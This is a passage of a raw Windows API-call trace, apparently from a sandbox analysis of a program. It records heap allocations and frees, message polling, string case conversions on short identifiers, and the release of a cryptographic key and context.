lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.066] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.066] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.066] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0188.067] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.067] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.070] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.071] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.071] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.075] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.075] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0188.075] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.075] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0188.075] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.075] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.076] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.076] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.076] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.076] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.076] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.077] CryptDestroyKey (hKey=0xaa5960) returned 1 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.077] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.077] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.077] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.077] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.077] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.077] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.078] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.078] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.078] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.078] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.078] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.078] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.078] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0188.078] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.079] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.079] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.079] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.079] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.079] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.079] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.079] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.079] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.079] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.079] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.079] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.079] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.079] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.080] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.080] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.080] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.080] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.080] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.080] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.080] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.080] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.080] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.081] CryptReleaseContext (hProv=0xaad240, dwFlags=0x0) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.082] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.082] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.082] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.082] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.083] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.083] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0188.083] HeapFree (in: 